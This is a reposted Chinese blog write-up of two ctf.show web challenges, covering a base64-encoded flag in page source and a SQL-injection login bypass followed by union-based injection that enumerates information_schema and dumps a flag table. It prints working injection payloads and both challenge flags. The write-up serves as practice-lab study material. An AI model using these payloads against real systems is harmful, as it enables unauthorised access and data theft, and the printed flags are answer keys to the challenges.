首页 > Web开发 > 详细

ctf.show web板块

时间:2020-10-28 19:50:30      阅读:46      评论:0      收藏:0      [点我收藏+]

web签到题

右击查看源码--> 

技术分享图片

 

 ZmxhZ3szYTIzYzU5OC0zOTIzLTQzMjQtYjlhMi1hZGYzNmM5MGEyZWR9

  base64解密即可

web2-最简单的sql注入

账号登录框中输入 

‘ or 1=1 # 

  

密码登录框随意  

原理

 登录框执行的sql语句  

union select username,password from user where username = $username and password =$password

当输入的用户名、密码写进去,放入数据库执行成功,有结果返回,说明账号密码正确。  要是构造  

‘ or 1=1 # ,则执行
union select username,password from user where username =  or 1=1 #  and password =$password

单引号闭合查询语句,# 将后面的东西注释掉。  查询的username为空,就返回了user表下的所有内容。 也就有数据返回,查询成功,则登陆成功。

 

接下来用联合查询完成注入。

首先直接用 

-1‘ union select 1,2,3 #

 判断出当前表有 三个字段。 同时判断出回显点为第二个字段。

 

-1 union select 1,database(),3 #

 

查到库名  web2

 

继续查表名。

-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

两个表  user、flag 

 

查flag表下的字段

-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=flag #

就flag 一个。

查flag

-1 union select 1,flag,3 from flag #

 

      技术分享图片

 

 

 

结果为  flag{1d24a843-033a-448b-92f7-b5a407cdde5f}                    

ctf.show web板块

原文:https://www.cnblogs.com/tianyu0125/p/13890642.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!